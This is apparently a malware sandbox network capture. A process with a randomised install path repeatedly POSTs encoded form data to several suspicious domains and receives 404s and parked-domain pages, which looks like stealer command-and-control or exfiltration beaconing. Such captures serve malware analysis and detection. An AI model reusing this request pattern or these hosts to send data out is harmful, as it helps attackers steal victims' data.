Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:30.682261944 CET | 704 | OUT | POST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=xWPgQXPrdoR2/jHA/GGHRE034SNGg0NF9iAsDwl4tEoxFgo41F3VsUBClNzhOCwOh4OsPd9+dwQDAcimAwJI/86WRWA8AR6EEBSMDNJ/UFSImZYZbqa4zlhtD0B+ibcK9pjFAxcXmq8XUw1w3F6QOEio3tKG6jg6oZ1CMAgq9rYiwGR5xZSW+WSPOA8Oy1FN6g==
Oct 31, 2024 01:39:31.629831076 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:31 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50033 | 20.2.249.7 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:33.235064030 CET | 724 | OUT | POST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=xWPgQXPrdoR2+D3AzHGHGU043yNGpUNZ9iMsD1cls3AxFBY4nQDV5UBC99zgAiwRh4DTPYd+dwEDAdSmAH1LwM6UZ2A6ER6EEBSMDNNRUFKI66QZbLa/tVhuTEB+1LcO9pjdAwA9mv4XUwlw3U6fX0iu9NLx+y80mrMqHRc/j5BC1AcjgozBsW28TH16/24EhiOH/Mf7Lxo1UOKp3dk+9w4=
Oct 31, 2024 01:39:34.175077915 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:34 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50034 | 20.2.249.7 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:35.768433094 CET | 10806 | OUT | POST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:39:36.709728956 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:36 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 50035 | 20.2.249.7 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:38.311378956 CET | 449 | OUT | GET /wr26/?78=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:39:39.232633114 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:39 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 50036 | 203.161.49.193 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:44.955065012 CET | 707 | OUT | POST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=4HgsinFGTOn6eDIgkDeW2VgudT7PfoumY1YRdqtsnA/C/qK/cFV5OUqh2PvtZr3gn/9LNd/LQUYF5HTcYEKMHYpWD9Y7r5WzIsgV6awqEW8yOWtsYFvNzeBjByzgAo4qjRGn1Qp+P1mIy+Cpsf6NOpo4fAkWrFSfptCp+/GIDmXxa5q8E/g2CR8D9+D7bHmJvw==
Oct 31, 2024 01:39:45.613501072 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:45 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 50037 | 203.161.49.193 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:47.505494118 CET | 727 | OUT | POST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=4HgsinFGTOn6MyYgmkyWjFgpDj7PWIuiY1kRdr587lPC/K6/dEV5PUqh+vunE737n/xtNcDLQUMF5GjcZ1KLIopULdY10JWzIsgV6ZMMEXUyPmdsXEvCweBiWCzgR45CjRGg1RlYPwiIy/ypsO6MBpo+SglSo3LSmpb87PO1MmPqWfnmVOBhQRYwg5KPWEbA0x/8Jt96C21zQks8K6Iq/E0=
Oct 31, 2024 01:39:48.200424910 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:48 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 50038 | 203.161.49.193 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:50.050745964 CET | 10809 | OUT | POST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:39:50.722810984 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:50 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 50039 | 203.161.49.193 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:52.597141981 CET | 450 | OUT | GET /ep69/?78=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:39:53.275543928 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Thu, 31 Oct 2024 00:39:53 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 50040 | 199.59.243.227 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:39:58.421084881 CET | 704 | OUT | POST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=LTHcjhwtSaHetbtN3OB5ybhpGB/1fsxEFzk+Wfkqqb3u9L7NbsMsRu4z4hur9Y3OCCwGapemyByRI0viphWh9Fw7lXgMcn1PR2Ux23v/z+1I/IU1Aoo14RGTe5x+iwEsP+ffOggXsjSjMMJcOVAMCaMJRYFJTu9HiPsJnC4v7cx4PbOlhE8vk1LaGTdjmaWcuw==
Oct 31, 2024 01:39:59.066325903 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:39:58 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: a00cf52a-db1a-4792-96e8-c5355dcf4b75
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=a00cf52a-db1a-4792-96e8-c5355dcf4b75; expires=Thu, 31 Oct 2024 00:54:58 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 01:39:59.066339970 CET | 563 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTAwY2Y1MmEtZGIxYS00NzkyLTk2ZTgtYzUzNTVkY2Y0Yjc1IiwicGFnZV90aW1lIjoxNzMwMzM1MT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 50041 | 199.59.243.227 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:00.955265045 CET | 724 | OUT | POST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: 78=LTHcjhwtSaHe8L9N1vB56bhqKh/1RMxfFzg+WdI6rpTu6pjNatMsEu4zgRuugo3FCDNzaoimyBmRI0fipy+g9Vw5t3gCTH1PR2Ux23TRz/dI/5k1G9c21xGcZ5x+mwEoP+fxOh89shajMJlcOAsPJaM1OoE9TtANttFanzY20+IeD9D/w1d421vpbUUXrZrV18zQVF5xkiQTxBNR+f256d8=
Oct 31, 2024 01:40:01.570861101 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:00 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: da303aa3-86e7-4589-b17c-e8d56ec0f5a5
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=da303aa3-86e7-4589-b17c-e8d56ec0f5a5; expires=Thu, 31 Oct 2024 00:55:01 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 01:40:01.570873976 CET | 563 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGEzMDNhYTMtODZlNy00NTg5LWIxN2MtZThkNTZlYzBmNWE1IiwicGFnZV90aW1lIjoxNzMwMzM1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 50042 | 199.59.243.227 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:03.508836985 CET | 10806 | OUT | POST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Data Ascii: 78=[TRUNCATED]
Oct 31, 2024 01:40:04.158436060 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:03 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: 4bece0dd-2459-40f9-94f5-9732b4e0fcbd
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=4bece0dd-2459-40f9-94f5-9732b4e0fcbd; expires=Thu, 31 Oct 2024 00:55:04 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 01:40:04.158530951 CET | 563 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGJlY2UwZGQtMjQ1OS00MGY5LTk0ZjUtOTczMmI0ZTBmY2JkIiwicGFnZV90aW1lIjoxNzMwMzM1Mj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 50043 | 199.59.243.227 | 80 | 3132 | C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe
Timestamp | Bytes transferred | Direction | Data
Oct 31, 2024 01:40:06.120237112 CET | 449 | OUT | GET /xyex/?78=GRv8gXQeeb2Gl8ts68dy26JEIDOFTPQDU1Y3CPEivIL54q3aRuVfXNser16Tn8T/OBl4IICKxXKXWQiZ2Uzn7HwRtVNzQ2FbKXtno3vR39Y/zqEhWKkV0ww=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 31, 2024 01:40:06.732575893 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Thu, 31 Oct 2024 00:40:06 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1466
                                                                                                                                                                              x-request-id: 06763804-011f-4aeb-99bf-3bce110d47c1
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a631AbOZG8JUGk42XSOPVi45Ptq5ZWIiWe69Wsht9oPBgPk+3b+os+d8jOfLia2xIq1ZmHNnK2Q/AhRAt+ohBw==
                                                                                                                                                                              set-cookie: parking_session=06763804-011f-4aeb-99bf-3bce110d47c1; expires=Thu, 31 Oct 2024 00:55:06 GMT; path=/
                                                                                                                                                                              connection: close
